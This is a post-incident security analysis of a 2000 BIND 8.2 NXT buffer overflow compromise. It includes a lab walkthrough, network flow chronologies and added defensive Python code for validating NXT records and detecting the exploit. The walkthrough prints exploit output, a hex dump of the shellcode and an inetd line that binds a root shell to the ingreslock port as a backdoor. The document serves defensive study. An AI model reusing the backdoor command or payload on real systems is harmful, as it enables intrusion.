Security Analysis of Linux BIND 8.2 nxt bug hacking (Case II)


Summary

The hacker compromised
victim1.ie (137.189.victim1)
victim2.ie (137.189.victim2)
Victim_Net previous intranet gateway (137.189.victim3)
Victim_Net current Mail server (137.189.vicitm4)
via the BIND 8.2 NXT bug on 22nd Feb 2000.

The hacker first set up a trap at a DNS server (xx0.yy0.33.45) for a domain under his/her control: a hacking program bound to port 53 that waited for a DNS query from the victim. Once the hacker made the victim host send a DNS query to the hacker host (for instance by using nslookup), the program on the hacker DNS server exploited the buffer overflow in the victim's named and obtained root access by starting a root shell.

See
http://www.cert.org/advisories/CA-99-14-bind.html
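The following Python script is an added example, not part of the original report and not BIND's own code. It parses a DNS response and applies the length checks a resolver has to make on an NXT record: RDLENGTH against the message, the next-domain name against RDLENGTH, and the type bit map against the 16-octet limit of RFC 2535, which is the class of validation the CA-99-14 advisory describes as missing in BIND 8.2. The messages it runs on are constructed here (they reuse the demo names from the section below); the NXT layout and bit-map limit are taken from RFC 2535, not from the page.

```python
import struct

NXT_TYPE = 30  # RFC 2535 NXT resource record, the type CA-99-14 concerns


class MalformedDNS(ValueError):
    """Raised when a message fails a length or structure check."""


def _read_name(buf, off, allow_pointers=True):
    """Read a wire-format name at buf[off]; return (name, offset after it).
    Labels are bounds-checked against the buffer they live in, and
    compression pointers are accepted only when they point backwards."""
    labels, end, hops = [], None, 0
    while True:
        if off >= len(buf):
            raise MalformedDNS("name runs past end of buffer")
        length = buf[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:  # compression pointer (RFC 1035 4.1.4)
            if not allow_pointers or off + 1 >= len(buf) or hops > 16:
                raise MalformedDNS("bad compression pointer")
            ptr = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            if ptr >= off:
                raise MalformedDNS("compression pointer does not point backwards")
            end = off + 2 if end is None else end
            off, hops = ptr, hops + 1
            continue
        if length > 63 or off + 1 + length > len(buf):
            raise MalformedDNS("label of %d octets exceeds buffer" % length)
        labels.append(buf[off + 1:off + 1 + length].decode("ascii", "replace"))
        off += 1 + length
    return ".".join(labels) + ".", (off if end is None else end)


def check_nxt_rdata(rdata):
    """NXT RDATA: uncompressed next-domain name, then a type bit map of 1..16
    octets (RFC 2535 section 5.2). Returns the next-domain name."""
    next_name, used = _read_name(rdata, 0, allow_pointers=False)
    if not 1 <= len(rdata) - used <= 16:
        raise MalformedDNS("NXT type bit map of %d octets" % (len(rdata) - used))
    return next_name


def parse_response(msg):
    """Parse header, question and answer sections; return [(owner, type, rdata)]."""
    if len(msg) < 12:
        raise MalformedDNS("shorter than a DNS header")
    _id, _flags, qdcount, ancount, _ns, _ar = struct.unpack_from("!6H", msg, 0)
    off = 12
    for _ in range(qdcount):
        _qname, off = _read_name(msg, off)
        if off + 4 > len(msg):
            raise MalformedDNS("truncated question")
        off += 4  # QTYPE, QCLASS
    answers = []
    for _ in range(ancount):
        owner, off = _read_name(msg, off)
        if off + 10 > len(msg):
            raise MalformedDNS("truncated RR header")
        rtype, _rclass, _ttl, rdlength = struct.unpack_from("!HHIH", msg, off)
        off += 10
        if off + rdlength > len(msg):
            raise MalformedDNS("RDLENGTH %d runs past end of message" % rdlength)
        rdata = msg[off:off + rdlength]
        if rtype == NXT_TYPE:
            check_nxt_rdata(rdata)  # never read a name beyond what RDLENGTH covers
        answers.append((owner, rtype, rdata))
        off += rdlength
    return answers


def is_well_formed(msg):
    try:
        parse_response(msg)
        return True
    except MalformedDNS:
        return False


# --- constructed sample messages (not captured traffic) ---------------------
def encode_name(name):
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"


def build_response(qname, owner, rdata, declared_rdlength=None):
    """One-answer NXT response whose RDLENGTH can deliberately be set wrong."""
    rdlength = len(rdata) if declared_rdlength is None else declared_rdlength
    msg = struct.pack("!6H", 0x1234, 0x8180, 1, 1, 0, 0) + encode_name(qname) + struct.pack("!HH", 1, 1)
    return msg + encode_name(owner) + struct.pack("!HHIH", NXT_TYPE, 1, 300, rdlength) + rdata


NXT_BITMAP = b"\x40\x00\x00\x02"  # bits set for types A (1) and NXT (30)
QNAME, OWNER = "www.bait.hkntec.net.", "bait.hkntec.net."
GOOD = build_response(QNAME, OWNER, encode_name(QNAME) + NXT_BITMAP)
# RDLENGTH says 4 octets, but the embedded name's own label lengths run on much
# further: a parser that trusts the labels rather than RDLENGTH reads past the record.
BAD_SHORT = build_response(QNAME, OWNER, encode_name("a" * 63 + ".bait.hkntec.net.") + NXT_BITMAP, 4)
# RDLENGTH claims more octets than the message actually carries.
BAD_LONG = build_response(QNAME, OWNER, encode_name(QNAME) + NXT_BITMAP, 4000)
```

The two malformed messages fail in different places: `BAD_LONG` is rejected by the RDLENGTH-against-message check, `BAD_SHORT` by the name-against-RDLENGTH check inside `check_nxt_rdata`. A parser that copies the next-domain name by walking its label lengths without the second check is the shape of the bug the advisory covers.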


A simple demo to show how it works

Hacker domain bait.hkntec.net
Hacker DNS server
(i.e. DNS server of bait.hkntec.net domain)
ntec24.arm.hkntec.net (192.168.64.24)
Victim host
(host running BIND 8.2 named,
whether it is DNS server or not,
it doesn't matter)
victim.fox.hkntec.net (192.168.128.50)

The hacker first needs to delegate the hacker domain (bait.hkntec.net) to the hacker host (192.168.64.24), with an NS record in the parent zone:

; Data file of hostnames in this zone.
;
@       IN      SOA     hkntec.net. shlam.ie.cuhk.edu.hk. (
                        2000007102       ; serial, todays date + todays serial #
                        300             ; refresh, seconds
                        60              ; retry, seconds
                        1W              ; expire, seconds
                        8H )            ; minimum, seconds
                NS      ns.hkntec.net.
;
bait                    IN      NS              ntec24.arm.hkntec.net.

At the hacker host (192.168.64.24), probe the victim's BIND version and OS:
[root@ntec24 ~]$ dig @192.168.128.50 version.bind chaos txt | grep \"8
VERSION.BIND.           0S CHAOS TXT    "8.2.1"


[root@ntec24 ~]$ telnet 192.168.128.50
Trying 192.168.128.50...
Connected to victim (192.168.128.50).
Escape character is '^]'.

Red Hat Linux release 6.1 (Cartman)
Kernel 2.2.12-20 on an i686
login: 
Login incorrect



Then the hacker runs the buffer overflow program, which binds to the domain port (53):
ntec24:/tmp> ./bind_hack 1


Now, from any host, make the victim host query the bait.hkntec.net domain:
ntec4:/home/data/shlam> nslookup
Default Server:  fortress.fox.hkntec.net
Address:  192.168.128.230

> server victim.fox.hkntec.net
Default Server:  victim.fox.hkntec.net
Address:  192.168.128.50

> set type=ns
> bait.hkntec.net
Server:  victim.fox.hkntec.net
Address:  192.168.128.50

Non-authoritative answer:
bait.hkntec.net nameserver = ntec24.arm.hkntec.net

Authoritative answers can be found from:
ntec24.arm.hkntec.net   internet address = 192.168.64.24
> set type=a
> www.bait.hkntec.net
Server:  victim.fox.hkntec.net
Address:  192.168.128.50
...

The victim host now tries to resolve www.bait.hkntec.net by querying the hacker DNS server on port 53.

When the victim host queries the hacker DNS server, the hacker program returns a malformed NXT record that overflows a buffer in named, and the hacker gets a root shell on the victim host.

ntec24:/tmp> ./bind_hack 1
Received request from 192.168.128.50:1025 for www.bait.hkntec.net type=1
Entering proxyloop..
Linux victim 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
hostname
victim
echo "ingreslock stream tcp nowait root /bin/sh sh -i" > /tmp/h
/usr/sbin/inetd /tmp/h


ntec24:/tmp> telnet victim ingreslock
Trying 192.168.128.50...
Connected to victim (192.168.128.50).
Escape character is '^]'.
bash# whoami
whoami
root
bash# 


The tcpdump capture of the exploit traffic on the victim shows:
victim:/tmp> tcpdump -x -e -s 5000 host ntec24 | tcpf
Kernel filter, protocol ALL, datagram packet socket

14:29:52.475062 eth0 < 0:d0:9:2d:5b:79 0:0:0:0:0:1 ip 1514: ntec24.1101 > victim.domain: P 2899:4347(1448) ack 1 win 32120  (DF)
...
...
...
...
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 e9ac      ................
                0100 005e 8976 0c8d 4608 8946 108d 462e      ...^.v..F..F..F.
                8946 1456 eb54 5e89 f3b9 0000 0000 ba00      .F.V.T^.........
                0000 00b8 0500 0000 cd80 508d 5e02 b9ff      ..........P.^...
                0100 00b8 2700 0000 cd80 8d5e 02b8 3d00      ....'......^..=.
                0000 cd80 5b53 b885 0000 00cd 805b b806      ....[S.......[..
                0000 00cd 808d 5e0b b80c 0000 00cd 8089      ......^.........
                f3b8 3d00 0000 cd80 eb2c e8a7 ffff ff2e      ..=......,......
                0041 444d 524f 434b 5300 2e2e 2f2e 2e2f      .ADMROCKS.../../
                2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e      ../../../../../.
                2e2f 2e2e 2f00 5eb8 0200 0000 cd80 89c0      ./../.^.........
                85c0 0f85 8e00 0000 89f3 8d4e 0c8d 5618      ...........N..V.
                b80b 0000 00cd 80b8 0100 0000 cd80 e875      ...............u
                0000 0010 0000 0000 0000 0074 6869 7369      ...........thisi
                7373 6f6d 6574 656d 7073 7061 6365 666f      ssometempspacefo
                7274 6865 736f 636b 696e 6164 6472 696e      rthesockinaddrin
                7965 6168 7965 6168 696b 6e6f 7774 6869      yeahyeahiknowthi
                7369 736c 616d 6562 7574 616e 7977 6179      sislamebutanyway
                7768 6f63 6172 6573 686f 7269 7a6f 6e67      whocareshorizong
                6f74 6974 776f 726b 696e 6773 6f61 6c6c      otitworkingsoall
                6973 636f 6f6c eb86 5e56 8d46 0850 8b46      iscool..^V.F.P.F
                0450 ff46 0489 e1bb 0700 0000 b866 0000      .P.F.........f..
                00cd 8083 c40c 89c0 85c0 75da 6683 7e08      ..........u.f.~.
                0275 d38b 5604 4a52 89d3 b900 0000 00b8      .u..V.JR........
                3f00 0000 cd80 5a52 89d3 b901 0000 00b8      ?.....ZR........
                3f00 0000 cd80 5a52 89d3 b902 0000 00b8      ?.....ZR........
                3f00 0000 cd80 eb12 5e46 4646 4646 c746      ?.......^FFFFF.F
                1000 0000 00e9 fefe ffff e8e9 ffff ffe8      ................
                4ffe ffff 2f62 696e 2f73 6800 2d63 00ff      O.../bin/sh.-c..
                ffff ffff ffff ffff ffff ffff 0000 0000      ................
                706c 6167 7565 7a5b 4144 4d5d 3130 2f39      plaguez[ADM]10/9
                392d 6578 6974 0090 9090 9090 9090 9090      9-exit..........
...
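Added example (not from the report): a small Python scanner for the two things visible in the capture above, a long run of 0x90 NOP bytes and the marker strings the payload carries (ADMROCKS, plaguez[ADM], /bin/sh, a directory-traversal sequence). This is the kind of content check an IDS signature for this exploit makes. The input is constructed from selected hex lines of the dump above with the ASCII column dropped; the 32-byte sled threshold is an arbitrary choice.

```python
import re

# Constructed sample: selected hex lines from the tcpdump output above with the
# ASCII column dropped. It is a slice of the exploit payload, not a full packet.
SAMPLE_HEX = """
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 e9ac
0100 005e 8976 0c8d 4608 8946 108d 462e
f3b8 3d00 0000 cd80 eb2c e8a7 ffff ff2e
0041 444d 524f 434b 5300 2e2e 2f2e 2e2f
2e2e 2f2e 2e2f 2e2e 2f2e 2e2f 2e2e 2f2e
2e2f 2e2e 2f00 5eb8 0200 0000 cd80 89c0
4ffe ffff 2f62 696e 2f73 6800 2d63 00ff
706c 6167 7565 7a5b 4144 4d5d 3130 2f39
392d 6578 6974 0090 9090 9090 9090 9090
"""

# Byte strings seen in the captured payload; any one of them in DNS traffic
# on port 53 is worth an alert.
SIGNATURES = [b"ADMROCKS", b"plaguez[ADM]", b"/bin/sh", b"../../../"]


def hexdump_to_bytes(text):
    """Turn whitespace-separated 4-hex-digit groups (tcpdump -x style) into bytes."""
    groups = re.findall(r"\b[0-9a-fA-F]{4}\b", text)
    return bytes.fromhex("".join(groups))


def longest_nop_run(payload, nop=0x90):
    """Return (start_offset, length) of the longest run of NOP bytes."""
    best_start = best_len = run = 0
    for i, b in enumerate(payload):
        run = run + 1 if b == nop else 0
        if run > best_len:
            best_len, best_start = run, i - run + 1
    return best_start, best_len


def scan_payload(payload, sled_threshold=32):
    """Return a dict of findings: 'nop_sled' -> (offset, length) when a run of
    NOPs reaches the threshold, and each matched signature -> its offset."""
    findings = {}
    start, length = longest_nop_run(payload)
    if length >= sled_threshold:
        findings["nop_sled"] = (start, length)
    for sig in SIGNATURES:
        idx = payload.find(sig)
        if idx != -1:
            findings[sig.decode("ascii")] = idx
    return findings


SAMPLE_PAYLOAD = hexdump_to_bytes(SAMPLE_HEX)

if __name__ == "__main__":
    for key, value in scan_payload(SAMPLE_PAYLOAD).items():
        print("%-14s %s" % (key, value))
```

The NOP-run check is deliberately separate from the string matching: the strings identify this particular tool, while a long 0x90 run in a DNS message is a generic indicator that survives a change of marker strings.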



The real case analysis

Although four hosts were compromised, we only had the chance to examine 137.189.victim2. 137.189.victim1 had its OS upgraded just before we investigated the case. 137.189.victim3 and 137.189.vicitm4 are under Victim_Net management, and Victim_Net did not respond to this investigation. Hence we could only examine 137.189.victim2, which remained largely intact after the break-in.

Chronology

Feb 22nd

0222.07:41:46.488  0222.07:41:49.904   137.189.victim2   xxx.252.35.201  06      23( telnet  )  1555 (         )      10          520
0222.07:42:18.788  0222.07:42:21.648   137.189.victim2   xxx.252.35.201  06      23( telnet  )  1558 (         )       9          480
The hacker had probably scanned 137.189.victim2 and found the named port open. He/she then telnetted to 137.189.victim2 to identify its OS.

0222.07:42:57.760  0222.07:42:57.760   137.189.victim2   yyy.63.2.53     11    1024(         )    53 ( domain  )       1           63
0222.07:43:01.464  0222.07:43:01.464   137.189.victim2   yyy.8.10.90     11    1014(         )    53 ( domain  )       1           63
0222.07:43:01.900  0222.07:43:02.760   137.189.victim2   xx0.yy0.33.40   11    1024(         )    53 ( domain  )       2          126
0222.07:43:05.464  0222.07:43:06.464   137.189.victim2   xx0.yy0.33.45   11    1024(         )    53 ( domain  )       2          126
The hacker made 137.189.victim2 query the hacker domain, so that it connected to the hacker host (xx0.yy0.33.45).
0222.07:43:05.872  0222.07:43:30.544   137.189.victim2   xx0.yy0.33.45   06      53( domain  )  2212 (         )      13          795
Buffer overflow of named on 137.189.victim2.
0222.07:43:32.808  0222.07:43:32.808   137.189.victim2   xx0.yy0.33.45   01       0(         )   771 (  rtip   )       1           91
0222.07:43:41.yyy. 0222.07:43:55.hh.   137.189.victim2   xxx.252.35.201  06      23( telnet  )  1559 (         )      31         1517
Ping 137.189.victim2, then telnet to 137.189.victim2 via the established backdoor.
0222.13:14:46.594  0222.13:14:46.594   137.189.victim2   uuu.254.23.184  06    1109(         )   113 (  auth   )       1           60
0222.13:14:46.82   0222.13:14:46.82    137.189.victim2   uuu.254.23.184  06      21(   ftp   )  1562 (         )       1           60
0222.13:14:51.202  0222.13:14:52.614   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1563 (         )       5         1137
0222.13:15:21.838  0222.13:15:hh.310   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1570 (         )       5         1207
0222.13:15:16.718  0222.13:15:19.362   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1565 (         )       8          424
0222.13:15:38.774  0222.13:15:40.270   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1574 (         )       5         1343
0222.13:15:34.634  0222.13:15:36.842   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1573 (         )       6          320
0222.13:15:27.770  0222.13:15:33.190   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1572 (         )      17          892
0222.13:14:47.34   0222.13:15:43.690   137.189.victim2   uuu.254.23.184  06      21(   ftp   )  1562 (         )      46         3742
0222.12:57:57.174  0222.13:16:38.358   137.189.victim2   uuu.254.23.184  06      23( telnet  )  1539 (         )     841       119148
0222.13:17:12.918  0222.13:17:12.918   137.189.victim2   uuu.254.23.184  06    1110(         )   113 (  auth   )       1           60
0222.13:17:11.874  0222.13:17:11.874   137.189.victim2   uuu.254.23.184  06      21(   ftp   )  xxx6 (         )       1           60
0222.13:17:34.153  0222.13:17:35.533   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1591 (         )       5          268
0222.13:17:30.805  0222.13:17:32.345   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1590 (         )       5         1405
0222.13:17:27.513  0222.13:17:28.933   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  xxx9 (         )       5          268
0222.13:17:19.637  0222.13:17:21.169   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  xxx8 (         )       5         1344
0222.13:17:14.305  0222.13:17:38.341   137.189.victim2   uuu.254.23.184  06      21(   ftp   )  xxx6 (         )      36         2923
0222.13:17:37.421  0222.13:17:38.853   137.189.victim2   uuu.254.23.184  06      20(ftp-data )  1592 (         )       5         1464
0222.13:17:32.429  0222.13:18:15.77    137.189.victim2   uuu.254.23.184  06      23( telnet  )  1539 (         )       8         1738


Then a lot of FTP transfers.
0222.13:29:51.371  0222.13:29:57.515   137.189.victim2   ggg.233.ttt.6   06    1116(         )  6667 (         )       8          638
0222.13:30:25.231  0222.13:30:25.563   137.189.victim2   rrr.37.45.2     06     113(  auth   )  1434 (         )       3          124
0222.13:30:54.755  0222.13:30:55.215   137.189.victim2   vvv.161.0.254   06     113(  auth   )  1148 (         )       3          124
0222.13:30:54.291  0222.13:30:56.151   137.189.victim2   vvv.161.0.254   06    1118(         )  6667 (         )       6          358
0222.13:30:hh.911  0222.13:31:13.183   137.189.victim2   rrr.37.45.2     06    1117(         )  6667 (         )      11          705
0222.13:31:22.795  0222.13:31:hh.615   137.189.victim2   ttt.116.202.42  06     113(  auth   )  2143 (         )       3          152
0222.13:31:22.187  0222.13:31:29.215   137.189.victim2   ttt.116.202.42  06    1119(         )  6667 (         )       7          489
0222.13:31:39.839  0222.13:31:40.267   137.189.victim2   vvv.154.rrr.hh. 06     113(  auth   )  2661 (         )       3          124
0222.13:31:39.427  0222.13:31:41.67    137.189.victim2   vvv.154.rrr.hh. 06    1120(         )  6667 (         )       6          362
0222.13:32:00.695  0222.13:32:00.695   137.189.victim2   rrr.37.45.2     06    1117(         )  6667 (         )       1           74
0222.13:32:00.959  0222.13:32:01.363   137.189.victim2   vvv.159.0.90    06     113(  auth   )  1061 (         )       3          124
0222.13:32:00.547  0222.13:32:02.279   137.189.victim2   vvv.159.0.90    06    1121(         )  6667 (         )       5          324
0222.13:32:37.843  0222.13:32:38.vvv.  137.189.victim2   fff.163.216.60  06     113(  auth   )  fff. (         )       3          164
0222.13:32:37.191  0222.13:32:41.895   137.189.victim2   fff.163.216.60  06    1122(         )  6667 (         )       8          551
0222.13:32:54.43   0222.13:32:54.387   137.189.victim2   fff.164.211.2   06     113(  auth   ) 46hh. (         )       3          124
0222.13:32:53.735  0222.13:32:58.135   137.189.victim2   fff.164.211.2   06    1123(         )  6667 (         )       7          488
0222.13:33:31.947  0222.13:33:34.419   137.189.victim2   hh.8.4.32       06    1080(         )  3359 (         )       4          160
0222.13:33:35.723  0222.13:33:35.723   137.189.victim2   rrr.37.45.2     06    1117(         )  6667 (         )       1           74
0222.13:33:23.167  0222.13:34:11.839   137.189.victim2   199.2.32.11     06     113(  auth   ) 52273 (         )       7          284
0222.13:21:27.603  0222.13:34:hh.839   137.189.victim2   uuu.254.23.184  06      23( telnet  )  1539 (         )     762        61422
0222.13:33:22.443  0222.13:34:52.7     137.189.victim2   199.2.32.11     06    11hh.         )  6667 (         )      22         mmm.
The IRC bot starts, connecting out to port 6667.
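Added example, not part of the investigation's own tooling: Python code that parses the flow records above and looks for the sequence that marks this attack, a UDP query from the victim to an outside host on port 53 followed within seconds by a TCP session on the victim's port 53 with the same host, then an ICMP packet from that host and an inbound telnet session shortly after. The column layout, and the reading of the protocol column as hex (06 TCP, 11 UDP, 01 ICMP), are inferred from the log itself; the 120 s and 300 s windows are assumptions, and the sample records are the victim2 lines above without the annotation lines.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample: the flow records for 137.189.victim2 shown above, without
# the annotation lines.
SAMPLE_FLOWS = """
0222.07:41:46.488  0222.07:41:49.904   137.189.victim2   xxx.252.35.201  06      23( telnet  )  1555 (         )      10          520
0222.07:42:18.788  0222.07:42:21.648   137.189.victim2   xxx.252.35.201  06      23( telnet  )  1558 (         )       9          480
0222.07:42:57.760  0222.07:42:57.760   137.189.victim2   yyy.63.2.53     11    1024(         )    53 ( domain  )       1           63
0222.07:43:01.464  0222.07:43:01.464   137.189.victim2   yyy.8.10.90     11    1014(         )    53 ( domain  )       1           63
0222.07:43:01.900  0222.07:43:02.760   137.189.victim2   xx0.yy0.33.40   11    1024(         )    53 ( domain  )       2          126
0222.07:43:05.464  0222.07:43:06.464   137.189.victim2   xx0.yy0.33.45   11    1024(         )    53 ( domain  )       2          126
0222.07:43:05.872  0222.07:43:30.544   137.189.victim2   xx0.yy0.33.45   06      53( domain  )  2212 (         )      13          795
0222.07:43:32.808  0222.07:43:32.808   137.189.victim2   xx0.yy0.33.45   01       0(         )   771 (  rtip   )       1           91
0222.07:43:41.yyy. 0222.07:43:55.hh.   137.189.victim2   xxx.252.35.201  06      23( telnet  )  1559 (         )      31         1517
"""

# Column layout (inferred from the log): start, end, local host, remote host,
# protocol,local port(service), remote port (service), packets, bytes.
# The protocol column is read as hex (06 TCP, 11 UDP, 01 ICMP); that "11" is
# UDP follows from those records being port-53 "domain" lookups.
FLOW_RE = re.compile(
    r"^(?P<start>\S+)\s+(?P<end>\S+)\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?P<proto>[0-9a-fA-F]{2})\s+(?P<lport>\d+)\(\s*(?P<lsvc>[^)]*?)\s*\)\s+"
    r"(?P<rport>\S+)\s+\(\s*(?P<rsvc>[^)]*?)\s*\)\s+(?P<pkts>\d+)\s+(?P<bytes>\d+)\s*$")
# MMDD.HH:MM:SS.fff; the fraction may be anonymised, in which case it is ignored.
TIME_RE = re.compile(r"^\d{4}\.(\d{2}):(\d{2}):(\d{2})\.?(\d*)")


@dataclass
class Flow:
    start: float   # seconds since midnight; all records are from the same day
    remote: str
    proto: int
    lport: int
    rport: int
    rsvc: str
    pkts: int
    nbytes: int


def parse_time(token):
    m = TIME_RE.match(token)
    if not m:
        return None
    h, mi, s, frac = m.groups()
    return int(h) * 3600 + int(mi) * 60 + int(s) + (int(frac) / 10 ** len(frac) if frac else 0.0)


def parse_flows(text):
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line.strip())
        if not m or parse_time(m["start"]) is None:
            continue  # annotation lines, or fields anonymised beyond recognition
        rport = int(m["rport"]) if m["rport"].isdigit() else -1
        flows.append(Flow(parse_time(m["start"]), m["remote"], int(m["proto"], 16),
                          int(m["lport"]), rport, m["rsvc"], int(m["pkts"]), int(m["bytes"])))
    return flows


def detect_nxt_sequence(flows, dns_window=120, login_window=300):
    """Flag each remote host that the victim queried over UDP/53 and that then
    carried a TCP session on the victim's port 53 within dns_window seconds.
    Each alert also records a later ICMP flow from that host and any inbound
    telnet sessions that began within login_window seconds of the TCP session."""
    by_remote = defaultdict(list)
    for f in flows:
        by_remote[f.remote].append(f)
    telnets = [f for f in flows if f.proto == 6 and f.lport == 23]
    alerts = []
    for remote, recs in by_remote.items():
        queries = [f for f in recs if f.proto == 17 and f.rport == 53]
        tcp53 = [f for f in recs if f.proto == 6 and f.lport == 53]
        for q in queries:
            for t in tcp53:
                if 0 <= t.start - q.start <= dns_window:
                    alerts.append({
                        "remote": remote,
                        "query_at": q.start,
                        "tcp53_at": t.start,
                        "tcp53_bytes": t.nbytes,
                        "icmp_after": any(f.proto == 1 and f.start >= t.start for f in recs),
                        "telnet_from": sorted({f.remote for f in telnets
                                               if t.start <= f.start <= t.start + login_window}),
                    })
    return alerts


if __name__ == "__main__":
    for alert in detect_nxt_sequence(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

Run over the sample, the two lookups to xx0.yy0.33.40 produce nothing, while the lookup to xx0.yy0.33.45 is followed 0.4 s later by the TCP/53 session, the ICMP packet and the telnet from xxx.252.35.201, which is exactly the sequence the annotations above describe.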

The other three hosts were also compromised on 22nd Feb.

137.189.victim3

0222.06:12:40.939 0222.06:12:41.263 137.189.victim3 hh.8.44.15 06 53( domain ) 4339 ( ) 3 164
0222.06:25:53.937 0222.06:25:53.937 137.189.victim3 hh.8.44.15 11 53( domain ) 1899 ( ) 1 86
0222.07:35:39.409 0222.07:35:42.585 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1547 ( ) 10 520
0222.07:36:14.829 0222.07:36:14.829 137.189.victim3 fff.41.0.4 11 1028( ) 53 ( domain ) 1 45
0222.07:36:14.485 0222.07:36:14.485 137.189.victim3 ttt.112.36.4 11 1028( ) 53 ( domain ) 1 64
0222.07:36:22.157 0222.07:36:42.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 128
0222.07:36:14.829 0222.07:36:50.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 3 ttt
0222.07:36:18.157 0222.07:37:06.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 3 ttt
0222.07:37:38.157 0222.07:37:38.157 137.189.victim3 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64
0222.07:37:22.157 0222.07:37:58.157 137.189.victim3 xx0.yy0.33.40 11 1028( ) 53 ( domain ) 2 127
0222.07:37:54.157 0222.07:37:54.157 137.189.victim3 xx0.yy0.33.42 11 1028( ) 53 ( domain ) 1 63
0222.07:37:50.305 0222.07:38:02.157 137.189.victim3 xx0.yy0.33.45 11 1028( ) 53 ( domain ) 2 126
0222.07:38:32.449 0222.07:38:32.449 137.189.victim3 xx0.yy0.33.45 01 0( ) 771 ( rtip ) 1 91
0222.07:38:02.565 0222.07:38:19.521 137.189.victim3 xx0.yy0.33.45 06 53( domain ) 2208 ( ) 13 795
0222.07:38:33.708 0222.07:39:01.640 137.189.victim3 xxx.252.35.201 06 23( telnet ) 1548 ( ) 55 2611
0222.11:45:05.207 0222.11:45:06.695 137.189.victim3 137.189.hh..152 06 139(netbios-s) 2289 ( ) 4 160
0222.11:45:06.707 0222.11:45:09.711 137.189.victim3 137.189.hh..152 01 0( ) 771 ( rtip ) 3 318
0222.12:33:10.52 0222.12:34:33.676 137.189.victim3 xxx.252.36.43 06 23( telnet ) 1056 ( ) 219 50268

137.189.vicitm4

0222.06:12:40.107 0222.06:13:25.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 7 372
0222.06:14:13.431 0222.06:14:13.431 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52
0222.06:15:49.427 0222.06:15:49.427 137.189.vicitm4 hh.8.44.15 06 53( domain ) 4297 ( ) 1 52
0222.06:25:53.897 0222.06:25:53.897 137.189.vicitm4 hh.8.44.15 11 53( domain ) 1895 ( ) 1 86
0222.07:29:00.330 0222.07:29:04.78 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1536 ( ) 11 566
0222.07:30:50.169 0222.07:30:52.961 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 9 486
0222.07:31:04.49 0222.07:31:04.49 137.189.vicitm4 yyy.8.10.90 11 10hh. ) 53 ( domain ) 1 64
0222.07:31:04.693 0222.07:31:04.693 137.189.vicitm4 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 45
0222.07:31:12.601 0222.07:31:32.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 128
0222.07:31:04.693 0222.07:31:40.601 137.189.vicitm4 xx0.yy0.33.45 11 10hh. ) 53 ( domain ) 3 ttt
0222.07:31:51.565 0222.07:31:52.817 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1538 ( ) 2 80
0222.07:31:08.601 0222.07:31:56.601 137.189.vicitm4 xx0.yy0.33.42 11 10hh. ) 53 ( domain ) 3 ttt
0222.07:32:12.601 0222.07:32:12.601 137.189.vicitm4 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 1 64
0222.07:32:16.301 0222.07:32:33.201 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1540 ( ) 28 1334
0222.07:32:28.601 0222.07:32:28.601 137.189.vicitm4 xx0.yy0.33.45 11 53( domain ) 3003 ( ) 1 64
0222.07:32:47.577 0222.07:32:57.129 137.189.vicitm4 xxx.252.35.201 06 23( telnet ) 1541 ( ) 20 988

137.189.victim1

0222.07:39:52.384 0222.07:39:52.384 137.189.victim1 ttt.5.5.hh. 11 10hh. ) 53 ( domain ) 1 63
0222.07:39:52.560 0222.07:40:04.152 137.189.victim1 xx0.yy0.33.40 11 10hh. ) 53 ( domain ) 2 126
0222.07:39:57.44 0222.07:40:00.hh. 137.189.victim1 xxx.252.35.201 06 23( telnet ) 1551 ( ) 10 526
